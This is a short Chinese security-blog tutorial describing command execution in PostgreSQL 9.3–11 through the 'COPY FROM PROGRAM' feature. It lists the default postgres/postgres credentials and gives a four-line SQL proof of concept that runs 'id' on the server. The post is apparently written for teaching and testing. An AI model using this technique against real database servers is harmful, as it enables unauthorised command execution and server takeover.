大横幅1
大横幅2
到期时间:永久 到期时间:推广
小横幅3 小横幅4
  1. 当前位置:网站首页 > 技术教程

PostgreSQL 高权限命令执行漏洞


PostgreSQL 是一款关系型数据库。其9.3到11版本中存在一处“特性”,管理员或具有“COPY TO/FROM PROGRAM”权限的用户,可以使用这个特性执行任意命令。


默认账号密码为postgres/postgres。

首先连接到postgres中,并执行参考链接中的POC:


  1. <font face="宋体" size="4">DROP TABLE IF EXISTS cmd_exec;

  2. CREATE TABLE cmd_exec(cmd_output text);

  3. COPY cmd_exec FROM PROGRAM 'id';

  4. SELECT * FROM cmd_exec;</font>



FROM PROGRAM语句将执行命令id并将结果保存在cmd_exec表中

大概就这些……


本文最后更新于2020-10-9,已超过 3个月没有更新,如果文章内容或图片资源失效,请留言反馈,我们会及时处理,谢谢!
获取更多资讯请加入交流群

    协助本站SEO优化一下,谢谢!
    关键词不能为空
版权说明

本文地址:http://kirinbk.cn/post-391.html
免责声明:本站文章仅用于科普及教育用途,远离犯罪!

发表评论

联系我们

在线咨询:点击这里给我发消息

QQ交流群:KirinBlog

工作日:8:00-23:00,节假日休息

扫码关注